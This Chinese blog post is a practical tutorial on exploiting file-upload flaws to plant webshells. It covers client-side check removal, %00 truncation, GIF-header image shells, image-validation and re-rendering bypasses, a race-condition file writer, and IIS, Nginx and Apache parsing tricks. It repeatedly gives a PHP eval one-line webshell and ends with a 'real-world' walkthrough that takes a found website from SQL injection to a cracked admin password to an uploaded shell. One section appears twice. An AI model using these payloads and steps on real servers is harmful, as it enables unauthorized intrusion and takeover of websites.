7z apache解析漏洞_文件上传漏洞方式

最新推荐文章于 2024-04-12 19:05:35 发布
最新推荐文章于 2024-04-12 19:05:35 发布
阅读量408 收藏
点赞数
文章标签: 7z apache解析漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39588084/article/details/111846405
版权

文件上传是获取shell,拿到主机权限。

需制作一个木马,大马,小马,一句话木马,首尾去空(空格 :.jpg

基础的是大小写,修改后缀(jpg,png,phtml,空格.htaccess),修改Content-Type: image/png 上传,修改Ftype=filetype为php,,

1,本地JS 远程content-type验证突破

上传一个php文件,窗口显示文件不允许上传,请上传jpg png gif 时  并且反应速度很快,判断其为js验证方式

方法:直接关闭js;将js判断去掉,把js代码删除

删除方法:页面右键另存为,得到html文件,找到function checkFile(最底行)  将其删除

2.&&%00截断

%00截断  相当于sql注入中的注释符号  有了这个东西 后面的函数就没了 save_path变量是可控的  get  post同理

上传php  bp抓包  更改save_path为文件地址,就成功上传了

eg:save_path=../upload/ 改为 save_path=../upload/shell.php%00(%00需要url解码)

filename=”shell.php”  改为  shell.jpg

3.文件包含漏洞与图片码

①文件包含漏洞  可以将图片带入到php代码里,从而执行

制作图片马:

制作一个GIF格式的图片,因为这种图片格式明显   打开图片编码,

在末尾插入<?php @eval($_POST['123']);?> 需要的码  一定要在notepad++软件输入  np有16进制

制作完成后上传  成功后  打开菜刀链接

②文件头  GIF的文件头是GIF89A,ZIP是压缩文件,7z的压缩文件头是7z

GIF89a

<?php @eval($_POST['123']);?>

伪造一个GIF的文件马  上传 成功后 连接菜刀

4.getimagesize  exif  二次渲染绕过

①getimagesize函数获取图像信息,是一个数组,匹配的content-type使用文件包含漏洞即可上传成功

首先制作一个图片码,使用notepad++来插入

打开gif图片文件插入到末尾 <?php @eval($_POST['123']); phpinfo(); ?>

写入完成后 上传  连接菜刀

②通过exif方式,判断imagetype

首先制作一个图片码,使用notepad++来插入

打开gif图片文件插入到末尾 <?php @eval($_POST['123']); phpinfo(); ?>

写入完成后 上传  连接菜刀

③二次渲染   imagecreatefromjpeg  重组这个图片  如果在文件末尾有php代码,就会欸重组吃掉 所以在开头一行的部位,插入php代码

首先制作一个图片码,使用notepad++来插入

打开gif图片文件插入到第一行随意位置 <?php @eval($_POST['123']); phpinfo(); ?>

写入完成后 上传  连接菜刀

5.条件竞争绕过

趁着上传解析 强行解析一句话

①php写入文件代码

想让写入内容变成字符串,不能用双引号,只能用单引号

重复发包,不是跑一个数字之类的东西,跑次数

上传写好的php文件,bp抓包  ctrl+I  payloads跑包(numbers)

添加变量a  1-11111111,跑numbers

菜刀链接

<?php$myfile = fopen("newfile.txt", "w") or die("Unable to open file!");

$txt = "<?php @eval($_POST['123']); ?>";

fwrite($myfile, $txt);

fclose($myfile);

?>

fwrite() 函数用于写入文件。

fwrite() 的第一个参数包含要写入的文件的文件名,第二个参数是被写的字符串

6.Nginx  IIS解析漏洞

打开一个gif图片  文末插入

<?php phpinfo(); eval($_POST[“123”]);?><%eval request(“123”)>

①IIS解析漏洞(基于IIS6.0版本)windows server 2003几乎通杀 因为微软并没有认为只是一个漏洞,就认为,这是一个特性,没有补丁 怎么利用

Eg:/a,asp/1.gif就会被解析成asp   上传文件到asp文件下

Eg2:

上传一个1.asp;.gif  就会被解析成asp

上传成功后 链接菜刀 选择脚本类型为asp

②Nginx解析漏洞(基于Vulhub)

上传1.gif/1.php就会被解析为php文件  连接菜刀

7.Apache解析漏洞  IIS6.0解析漏洞实战

环境:PHPStudy2013版本,这个版本中集成的Apache是一个有漏洞的版本此解析漏洞,只用于黑名单,对不可绕过的白名单没办法

①1.php.xxx  网站黑名单过滤,可能没有过滤xxx,xxx这个文件不是一个系统认定的格式,Apache低版本,往上走,找可以识别的扩展名,达到绕过效果。

上传1.php.xxx 成功连接菜刀

②IIS6.0解析漏洞实战

找一个网站,一个是前端,一个是后端,需要拿到管理员权限  到后台进行上传  后台登陆成功  尝试寻找漏洞,

使用awvs扫描站点  sal注入  得到管理员账号密码  cmd5解密

登陆后台 上传php图片  bp抓包  修改“filepath”后的数值为a.asp;.  上传成功  链接菜刀

8.文件上传  漏洞实战

①CwCms1.8后端任意文件上传漏洞  也就是说我们要先获取后台的管理密码 直接上传PHPerror

Ftype=filetype文件类型cwcms就是通过这种方式来判断上传文件的合法性

上传文件  bp抓包  修改ftype文件类型为php 上传成功

②FckEditor解析漏洞

常用上传地址

JSP 版:

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文

件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。

上传创建asp文件夹,利用currentFolder  修改%2F a.asp%2F    newfoldername处就可随意修改  创建成功后,上传php文件  成功后链接菜刀

③二次渲染   imagecreatefromjpeg  重组这个图片  如果在文件末尾有php代码,就会欸重组吃掉 所以在开头一行的部位,插入php代码

首先制作一个图片码,使用notepad++来插入

打开gif图片文件插入到第一行随意位置 <?php @eval($_POST['123']); phpinfo(); ?>

写入完成后 上传  连接菜刀

weixin_39588084
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传】00截断详解
redwand的博客
02-03 2万+
00截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到\0字符时,就认为读取到了一个字符串的结束符号。因此,我们可以通过修改数据包,插入\0字符的方式,达到字符串截断的目的。00截断通常用来绕过web软waf的白名单限制
Apache 后缀解析漏洞
guishengyx的博客
10-19 373
vulfocus靶场
Apache中间件漏洞
最新发布
weixin_58849785的博客
04-12 665
Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。
ClassCMS1.3自解压任意文件上传漏洞分析
weixin_42508548的博客
11-24 2490
0x01 前言 之前在某CMS也接触过自解压导致任意文件上传漏洞,只要对请求URL过滤不严谨,以及逻辑处理存在缺陷便可导致上传可控,直接一步获取服务器权限。本次通过分析ClassCMS源码,从原理上理解此类漏洞。代审小白,分析不到位请大佬们多多体谅。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、部署cms源码 3、访问http://192.168.150.9/index.php进行安装 4、输入相配置信息,安装
00截断原理
weixin_45522644的博客
07-17 4042
0x00截断原理: 0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。这个可以用在对文件类型名的绕过上。 但要注意是文件的16进制内容里的00,而不是文件名中的00 !!!就是说系统是按16进制读取文件(或者说二进制), 遇到ascii码为零的位置就停止,而这个ascii码为零的位置在16进制中是00,用0x开头表示16进制,也就是所说的0x00截断。 %00是被服务器解码为0x00发挥了截断作用。
00截断上传绕过_关于上传中的00截断分析
weixin_39922929的博客
12-20 615
关于上传中00截断的细节,很多朋友在渗透中都会发现一些这样的有趣现象,这个站点使用00截断上传的方法上传成功了,而换一个站点又失败了,这是什么原因呢?你看了这篇文章就会明白。00截断原理0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。00截断的限制条件1PHP<5.3.29,且GPC关闭00截断的利用方法上传文...
爱搜客建站系统(CICMS).7z
03-15
安装CICMS的过程相对简单,一般包括以下步骤:1) 下载并解压“爱搜客建站系统(CICMS).7z文件,获取源码;2) 配置服务器环境,如Apache或Nginx,确保PHP和MySQL运行正常;3) 创建数据库并导入CICMS的数据库文件;4)...
Employee Scheduler工作日程管理系统.7z
03-14
《员工调度系统——深入解析Employee Scheduler工作日程管理系统》 Employee Scheduler是一款专为管理企业员工工作日程而设计的用程序,旨在优化人力资源分配,提升工作效率。这个系统的源码是本次讨论的重点,它...
2009LandLite黑色建筑机械行业企业模板5078_企业网站模板PHP整站源码.zip.7z
08-01
6. **.zip和.7z格式**:这是两种常见的压缩文件格式。.zip是通用的,而.7z使用7-Zip软件压缩,压缩率更高,但需要特定解压工具。 7. **建站流程**:使用这套源码,开发者需要具备一定的PHP和Web开发知识,进行解压...
PhpStudy2018.7z
10-29
《PhpStudy2018:全面解析用》 PhpStudy是一款深受PHP开发者喜爱的集成开发环境,尤其在2018版本中,它进一步优化了功能,提升了用户体验,成为了许多初学者和专业开发者的首选工具。本篇文章将深入探讨...
z_searchServer:名度网络时尚港源代码(solr)服务器-服务器
03-24
本篇将深入解析名为“z_searchServer”的开源项目,该项目基于Apache Solr,一个强大的、可扩展的企业级搜索平台。Solr以其高效、灵活和可配置性在众多搜索引擎中脱颖而出,广泛用于电子商务、新闻门户、企业内部...
apache 文件上传 (CVE-2017-15715)漏洞复现
weixin_42675091的博客
09-02 1954
apache 文件上传 (CVE-2017-15715)漏洞复现
php 00截断,00截断之追本溯源
weixin_39620653的博客
03-09 604
0x00,%00,/00 之类的截断,本质都是一样的,只是不同表现方式而已。00截断在我写这篇文章之前,一直是很模糊的概念。看到别人利用成功,等到真要使用时又手足无措。用了一些时间学习了一下原理,本文引用比较多,仅仅是为了再次梳理一遍,不作为任何商业用途。截断原理截断漏洞出现的核心就是chr(0),这个字符不为空 (Null),也不是空字符 (“”),更不是空格。当程序在输出含有 chr(0)变...
文件上传漏洞-06】Web容器解析漏洞实战详解
cc
02-18 4204
文件上传漏洞第一个条件是文件成功上传且没能过滤掉恶意代码;第二个条件是让代码执行。对于第一个条件,存在着前端JS检测绕过、服务端MIME类型绕过、服务端后缀名绕过、文件内容绕过等,其根本目的是要上传文件。对于第二个条件,当中间件为IIS时:优先考虑绕过后缀名时采用恶意代码能够执行的后缀,这样文件能直接执行;当IIS版本为5.x或6.x时,考虑利用文件解析漏洞、目录解析漏洞执行该文件;当IIS版本为7.x时,考虑利用CGI-PHP解析漏洞来执行该文件
文件上传漏洞-07】中间件文件解析漏洞概述及实例——Apache、IIS和Nginx
m0_64378913的博客
07-12 3222
(1)第一种:未知扩展名解析漏洞 Apache文件解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析为PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
文件上传漏洞
zhhhb1005的博客
04-24 3043
今天来聊一聊web常见十大漏洞之一——文件上传,这个还是有点面熟的毕竟打过了几次交道,还是有我不熟悉的地方的。 参考博客: 太厉害了,终于有人能把文件上传漏洞讲的明明白白了 文件上传漏洞 一句话木马 二次渲染 条件竞争 ========================================================================= 目录 什么是文件上传漏洞 什么是webshell 一句话木马 入侵条件 产生文件上传漏洞的原因 文...
Apache上传漏洞(实验环境)
3569
07-22 2342
其实没有写博客的习惯 .... 然而现在,慢慢习惯了每个漏洞写几个实验 ... 如文章内容不当,及时删除 ... 这个缺陷让我意想不到 ... 竟然如此奇葩 ... 然后就记录下 ,也是拓展视野 网站上传文件格式有要求 ,如下 没想到压缩文件格式也能利用 0.0 然后在1.php 文本里边写入一句话木马 ,然后重命名为 1.php.7z ok ,上传成功
apache解析漏洞上传shell
A_dmin的博客
09-15 2145
apache解析漏洞上传shell 实验概述   Apache HTTP Server(简称 Apache) 是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中;本实验通过对apache服务器的测试,判断是否存在...
文件解析漏洞——Apache文件解析漏洞
weixin_54055099的博客
09-22 886
Apache文件解析漏洞
Apache文件解析漏洞影响版本
07-10
Apache文件解析漏洞(也被称为Apache Content Negotiation漏洞)影响的版本是Apache HTTP Server 2.4.49之前的版本。这个漏洞可能导致攻击者通过发送特制的请求来绕过文件扩展名检查,访问服务器上的敏感文件。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值